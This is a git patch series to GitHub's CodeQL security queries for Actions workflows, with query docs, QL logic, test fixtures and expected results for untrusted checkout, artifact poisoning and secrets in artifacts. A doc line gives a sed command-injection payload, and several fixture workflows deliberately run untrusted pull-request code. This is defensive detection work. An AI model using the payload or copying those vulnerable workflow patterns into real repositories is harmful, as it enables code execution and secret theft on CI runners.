@@ -1,4 +1,4 @@ -# Execution of Untrusted Checkedout Code +# Execution of Untrusted Checked-out Code ## Description @@ -10,9 +10,9 @@ GitHub workflows can be triggered through various repository events, including i - Employ unprivileged `pull_request` workflows followed by `workflow_run` for privileged operations. - Use labels like `safe to test` to vet PRs and manage the execution context appropriately. -The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second workflow should get triggered by the completion of the first one using `workflow_run` trigger event and access to repository secrets, so that it can download the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). +The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second privileged workflow with the access to repository secrets, triggered by the completion of the first workflow using `workflow_run` trigger event, downloads the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). -The artifacts downloaded from the first workflow should be considered untrusted and verified. +The artifacts downloaded from the first workflow should be considered untrusted and must be verified. ## Examples 
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md index c391e1255ed..71ba2032a9d 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md @@ -1,4 +1,4 @@ -# Execution of Untrusted Checkedout Code +# Execution of Untrusted Checked-out Code ## Description 
@@ -10,9 +10,9 @@ GitHub workflows can be triggered through various repository events, including i - Employ unprivileged `pull_request` workflows followed by `workflow_run` for privileged operations. - Use labels like `safe to test` to vet PRs and manage the execution context appropriately. -The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second workflow should get triggered by the completion of the first one using `workflow_run` trigger event and access to repository secrets, so that it can download the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). +The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second privileged workflow with the access to repository secrets, triggered by the completion of the first workflow using `workflow_run` trigger event, downloads the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). -The artifacts downloaded from the first workflow should be considered untrusted and verified. +The artifacts downloaded from the first workflow should be considered untrusted and must be verified. ## Examples From d6027267aaeda10673ad3f7433b9e1085dbb0dce Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Mon, 12 Aug 2024 09:31:58 +0000 Subject: [PATCH 0478/1267] fix variable name --- ql/src/Security/CWE-077/EnvPathInjectionCritical.md | 2 +- ql/src/Security/CWE-077/EnvPathInjectionMedium.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md index 436cf685996..36622d127d8 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md @@ -20,7 +20,7 @@ Do not allow untrusted data to influence the system PATH: Avoid using untrusted ### Incorrect Usage -Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps: +Consider the following basic setup where an environment variable `PATH` is set: ```yaml steps: diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md index 436cf685996..36622d127d8 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md @@ -20,7 +20,7 @@ Do not allow untrusted data to influence the system PATH: Avoid using untrusted ### Incorrect Usage -Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps: +Consider the following basic setup where an environment variable `PATH` is set: ```yaml steps: From 0baf7e3cef12575952606e6716e72ab0b36556b1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 12 Aug 2024 13:08:38 +0200 Subject: [PATCH 0479/1267] Update qlpack.yml --- ql/src/qlpack.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 9b4795a0d8a..b0d446479d8 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml 
@@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.36 +version: 0.1.37 groups: [actions, queries] suites: codeql-suites extractor: javascript From 1ca985b4152e9bad720464f066e35a0a69c89a68 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 12 Aug 2024 13:09:06 +0200 Subject: [PATCH 0480/1267] Update qlpack.yml --- ql/lib/qlpack.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index d9889fb0869..887228ecf88 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.36 +version: 0.1.37 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 From 293dd1a32b4a757069ace51820ce3e0472db2257 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 23 Aug 2024 17:40:25 +0200 Subject: [PATCH 0481/1267] Update ArgumentInjectionCritical.md --- ql/src/Security/CWE-088/ArgumentInjectionCritical.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.md b/ql/src/Security/CWE-088/ArgumentInjectionCritical.md index 4957297be92..92e480e4a7a 100644 --- a/ql/src/Security/CWE-088/ArgumentInjectionCritical.md +++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.md @@ -31,7 +31,7 @@ jobs: cat file.txt | sed "s/BODY_PLACEHOLDER/$BODY/g" > replaced.txt ``` -An attacker may set the body of an Issue comment to `BAR|g;1e whoami;#` and the command `whoami` will get executed during the `sed` operation. +An attacker may set the body of an Issue comment to `BAR/g;1e whoami;#` and the command `whoami` will get executed during the `sed` operation. ## References From 4f57aade35d120635eca67e5f1b706fd9d04b3fb Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 10:49:27 +0200 Subject: [PATCH 0482/1267] Improve accuracy of actions/download-artifact as a source If upload is on the same workflow, it needs to be triggered by a priv workflow --- .../security/ArtifactPoisoningQuery.qll | 6 +- .../.github/workflows/direct_cache6.yml | 2 +- .../.github/workflows/untrusted_checkout4.yml | 100 ++++++++++++++++++ .../ArtifactPoisoningCritical.expected | 3 - .../CWE-829/ArtifactPoisoningMedium.expected | 4 - .../UntrustedCheckoutCritical.expected | 10 ++ 6 files changed, 115 insertions(+), 10 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 08a49ab1abb..6881caccd52 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -26,8 +26,10 @@ class GitHubDownloadArtifactActionStep extends UntrustedArtifactDownloadStep, Us exists(this.getArgument("github-token")) or // There is an artifact upload step in the same workflow which can be influenced by an attacker on a checkout step - exists(UsesStep checkout, UsesStep upload | - this.getEnclosingWorkflow().getAJob().(LocalJob).getAStep() = checkout and + exists(LocalJob job, UsesStep checkout, UsesStep upload | + this.getEnclosingWorkflow().getAJob() = job and + job.getAStep() = checkout and + job.getATriggerEvent().getName() = "pull_request_target" and checkout.getCallee() = "actions/checkout" and checkout.getAFollowingStep() = upload and upload.getCallee() = "actions/upload-artifact" diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml index 3f35068eb7d..5948474d21a 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml 
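Review bot: The new conjunct `job.getATriggerEvent().getName() = "pull_request_target"` in `GitHubDownloadArtifactActionStep` ties the same-workflow upload case to a single event name, while the commit message speaks of any privileged workflow. Other privileged triggers, such as the `issue_comment` workflow this same commit adds as `untrusted_checkout4.yml`, no longer make a later `actions/download-artifact` an untrusted source through this branch, which is a false negative for artifact poisoning. If the library has no shared notion of a privileged trigger to call here, a set literal keeps the intent visible: `job.getATriggerEvent().getName() = ["pull_request_target", "issue_comment", "workflow_run"] and` (the exact list is for the maintainers to confirm). The `// There is an artifact upload step in the same workflow ...` comment should also state the trigger requirement. The enclosing predicate starts and ends outside the hunk.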
+++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml @@ -23,7 +23,7 @@ jobs: key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} restore-keys: ${{ runner.os }}-pip- - name: Download artifact - uses: actions/download-artifact@v4 + uses: dawidd6/action-download-artifact@v2 with: name: results path: results/ diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml new file mode 100644 index 00000000000..5494d97797e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml 
@@ -0,0 +1,100 @@ +name: Auto Bump Versions + +on: + issue_comment: + types: [created, edited] + +jobs: + add-same-version-label-to-pr: + runs-on: ubuntu-latest + if: github.event.issue.pull_request && contains(github.event.comment.body, '/add-same-version-label') + steps: + - uses: actions/checkout@v3 + - name: Add same version label + uses: actions/github-script@v6 + if: success() + with: + github-token: ${{secrets.GITHUB_TOKEN}} + script: | + github.rest.issues.addLabels({ + issue_number: context.issue.number, + owner: context.repo.owner, + repo: context.repo.repo, + labels: ['same version'] + }) + github.rest.issues.createComment({ + issue_number: context.issue.number, + owner: context.repo.owner, + repo: context.repo.repo, + body: '👋 Added [same version] label :)!' + }) + + build: + if: ${{ github.event.issue.pull_request }} && contains(github.event.comment.body, '/version') + runs-on: ubuntu-latest + + steps: + - name: Get PR details + uses: actions/github-script@v6 + id: get-pr + with: + script: | + const request = { + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: context.issue.number + } + core.info(`Getting PR #${request.pull_number} from ${request.owner}/${request.repo}`) + try { + const result = await github.rest.pulls.get(request) + return result.data + } catch (err) { + core.setFailed(`Request failed with error ${err}`) + } + + - name: Checkout PR + uses: actions/checkout@v3 + with: + repository: ${{ fromJSON(steps.get-pr.outputs.result).head.repo.full_name }} + ref: ${{ fromJSON(steps.get-pr.outputs.result).head.ref }} + + - name: Update version minor + if: contains(github.event.comment.body, '/version minor') + run: | + ./version.sh -u -n + echo "BUMP_TYPE=minor" >> $GITHUB_ENV + + - name: Update version major + if: contains(github.event.comment.body, '/version major') + run: | + ./version.sh -u -m + echo "BUMP_TYPE=major" >> $GITHUB_ENV + + - name: Update version patch + if: contains(github.event.comment.body, '/version 
patch') + run: | + ./version.sh -u -p + echo "BUMP_TYPE=patch" >> $GITHUB_ENV + + - name: Add labels + uses: actions/github-script@v6 + if: ${{ env.BUMP_TYPE }} + with: + script: | + github.rest.issues.addLabels({ + issue_number: context.issue.number, + owner: context.repo.owner, + repo: context.repo.repo, + labels: ['version/${{ env.BUMP_TYPE }}'] + }) + + - name: Push Changes + if: ${{ env.BUMP_TYPE }} + run: | + git config user.name 'github-actions[bot]' + git config user.email 'github-actions[bot]@users.noreply.github.com' + git pull + git add . + git commit -m "Update ${{ env.BUMP_TYPE }} version" --signoff + git push + diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 56ec92c54b6..11c6b98dc87 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected @@ -14,7 +14,6 @@ edges | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | -| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | 
@@ -46,8 +45,6 @@ nodes | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | -| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | semmle.label | python test.py | subpaths #select | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index da10247f1e0..431386fae06 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected 
@@ -14,7 +14,6 @@ edges | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | -| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | @@ -46,8 +45,5 @@ nodes | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | -| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | semmle.label | python test.py | subpaths #select -| .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | python test.py | 
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index d5ad134c976..8707849328b 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -147,6 +147,13 @@ edges | .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/workflows/untrusted_checkout4.yml:12:7:13:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:13:7:32:2 | Uses Step | +| .github/workflows/untrusted_checkout4.yml:37:7:55:4 | Uses Step: get-pr | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | +| .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | +| .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | +| .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | +| .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:79:7:91:4 | Uses Step | +| .github/workflows/untrusted_checkout4.yml:79:7:91:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:91:7:100:9 | Run Step | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | 
@@ -171,5 +178,8 @@ edges | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | | .github/workflows/test9.yml:16:9:17:48 | Run Step | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. 
| | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | From ac7b7b716260a63258870826588c10a90c5b76e4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 10:50:58 +0200 Subject: [PATCH 0483/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 887228ecf88..3fb25b389f8 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.37 +version: 0.1.38 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index b0d446479d8..c806f76f42b 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.37 +version: 0.1.38 groups: [actions, queries] suites: codeql-suites extractor: javascript From 4820626f291354570ea113c9c32155ae8ec68757 Mon Sep 17 00:00:00 2001 From: Rasmus Wriedt Larsen Date: Fri, 6 Sep 2024 14:04:46 +0200 Subject: [PATCH 0484/1267] Add SyntaxError query This can be used by autofix, but might also be nice to help find YAML syntax errors :shrug: --- ql/src/Debug/SyntaxError.ql | 17 +++++++++++++++++ .../SyntaxError/SyntaxError.expected | 1 + .../query-tests/SyntaxError/SyntaxError.qlref | 1 + ql/test/query-tests/SyntaxError/options | 1 + 4 files changed, 20 insertions(+) create mode 100644 ql/src/Debug/SyntaxError.ql create mode 100644 ql/test/query-tests/SyntaxError/SyntaxError.expected create mode 100644 ql/test/query-tests/SyntaxError/SyntaxError.qlref create mode 100644 ql/test/query-tests/SyntaxError/options 
diff --git a/ql/src/Debug/SyntaxError.ql b/ql/src/Debug/SyntaxError.ql new file mode 100644 index 00000000000..9a638ad7fbe --- /dev/null +++ b/ql/src/Debug/SyntaxError.ql @@ -0,0 +1,17 @@ +/** + * @name Syntax error + * @description A piece of code could not be parsed due to syntax errors. + * @kind problem + * @problem.severity recommendation + * @id actions/syntax-error + * @tags reliability + * correctness + * language-features + * debug + * @precision very-high + */ + +private import codeql.actions.ast.internal.Yaml + +from YamlParseError pe +select pe, pe.getMessage() diff --git a/ql/test/query-tests/SyntaxError/SyntaxError.expected b/ql/test/query-tests/SyntaxError/SyntaxError.expected new file mode 100644 index 00000000000..386e6554e2d --- /dev/null +++ b/ql/test/query-tests/SyntaxError/SyntaxError.expected @@ -0,0 +1 @@ +| .github/workflows/malformed.yml:7:4:7:4 | expected , but found '' | expected , but found '' | diff --git a/ql/test/query-tests/SyntaxError/SyntaxError.qlref b/ql/test/query-tests/SyntaxError/SyntaxError.qlref new file mode 100644 index 00000000000..97c5686103c --- /dev/null +++ b/ql/test/query-tests/SyntaxError/SyntaxError.qlref @@ -0,0 +1 @@ +Debug/SyntaxError.ql diff --git a/ql/test/query-tests/SyntaxError/options b/ql/test/query-tests/SyntaxError/options new file mode 100644 index 00000000000..096355709a6 --- /dev/null +++ b/ql/test/query-tests/SyntaxError/options @@ -0,0 +1 @@ +semmle-extractor-options: --tolerate-parse-errors --experimental From 2f68e6f26e352ce0373300b386828a5cd05c7633 Mon Sep 17 00:00:00 2001 From: Rasmus Wriedt Larsen Date: Fri, 6 Sep 2024 14:53:46 +0200 Subject: [PATCH 0485/1267] Add missing test file --- .../SyntaxError/.github/workflows/malformed.yml | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml 
diff --git a/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml b/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml new file mode 100644 index 00000000000..a8bfa4ae19a --- /dev/null +++ b/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml @@ -0,0 +1,7 @@ +on: pull_request_target + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo ${{ github.event.pull_request.body}} From fefeae44690ce1cbe9b3caba8fbbf4a00878a47e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 17:00:15 +0200 Subject: [PATCH 0486/1267] feat: New query to report GITHUB_TOKEN exposed in artifacts --- ql/src/Security/CWE-312/SecretsInArtifacts.ql | 40 +++++++++++++++++++ .../workflows/secrets-in-artifacts.yml | 23 +++++++++++ .../CWE-312/SecretsInArtifacts.expected | 1 + .../Security/CWE-312/SecretsInArtifacts.qlref | 2 + 4 files changed, 66 insertions(+) create mode 100644 ql/src/Security/CWE-312/SecretsInArtifacts.ql create mode 100644 ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml create mode 100644 ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected create mode 100644 ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref diff --git a/ql/src/Security/CWE-312/SecretsInArtifacts.ql b/ql/src/Security/CWE-312/SecretsInArtifacts.ql new file mode 100644 index 00000000000..07e498706d8 --- /dev/null +++ b/ql/src/Security/CWE-312/SecretsInArtifacts.ql 
@@ -0,0 +1,40 @@
+/**
+ * @name Secret In Artifacts
+ * @description Secrets are exposed in GitHub Artifacts
+ * @kind problem
+ * @problem.severity error
+ * @security-severity 9.0
+ * @precision high
+ * @id actions/secrets-in-artifacts
+ * @tags actions
+ * security
+ * experimental
+ * external/cwe/cwe-312
+ */
+
+import actions
+
+from UsesStep checkout, UsesStep upload
+where
+ checkout.getCallee() = "actions/checkout" and
+ upload.getCallee() = "actions/upload-artifact" and
+ checkout.getAFollowingStep() = upload and
+ (
+ not exists(checkout.getArgument("persist-credentials")) or
+ checkout.getArgument("persist-credentials") = "true"
+ ) and
+ upload.getVersion() =
+ [
+ "v4.3.6", "834a144ee995460fba8ed112a2fc961b36a5ec5a", //
+ "v4.3.5", "89ef406dd8d7e03cfd12d9e0a4a378f454709029", //
+ "v4.3.4", "0b2256b8c012f0828dc542b3febcab082c67f72b", //
+ "v4.3.3", "65462800fd760344b1a7b4382951275a0abb4808", //
+ "v4.3.2", "1746f4ab65b179e0ea60a494b83293b640dd5bba", //
+ "v4.3.1", "5d5d22a31266ced268874388b861e4b58bb5c2f3", //
+ "v4.3.0", "26f96dfa697d77e81fd5907df203aa23a56210a8", //
+ "v4.2.0", "694cdabd8bdb0f10b2cea11669e1bf5453eed0a6", //
+ "v4.1.0", "1eb3cb2b3e0f29609092a73eb033bb759a334595", //
+ "v4.0.0", "c7d193f32edcb7bfad88892161225aeda64e9392", //
+ ]
+select upload, "A secret is exposed in a public artifact uploaded by $@", upload,
+ "actions/upload-artifact"
diff --git a/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml b/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml
new file mode 100644
index 00000000000..611ac16dcfa
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml
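Review bot: The `upload.getVersion() = [...]` list is an unexplained magic constant: nothing in the query says why exactly the v4.0.0 to v4.3.6 tags and their commit SHAs are the affected range. A comment above the list such as `// upload-artifact releases assumed to still include hidden files such as .git/config by default; extend when further affected releases are identified` would tell a maintainer when to edit it (the wording is an assumption to confirm against the action's changelog). Because the match is on exact strings, a step pinned to an abbreviated SHA or a branch of one of those releases is not reported, which is worth stating in the same comment. The `persist-credentials` comparison is likewise an exact match on `"true"`, so it should be checked that quoted or differently cased YAML values reach the query as that string.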
@@ -0,0 +1,23 @@
+name: secrets-in-artifacts
+on:
+ pull_request:
+jobs:
+ test1:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - name: "Upload artifact"
+ uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2
+ with:
+ name: file
+ path: results
+ test2:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - name: "Upload artifact"
+ uses: actions/upload-artifact@v4
+ with:
+ name: file
+ path: results
+
diff --git a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected
new file mode 100644
index 00000000000..67c7fd6e8aa
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected
@@ -0,0 +1 @@
+| .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | actions/upload-artifact |
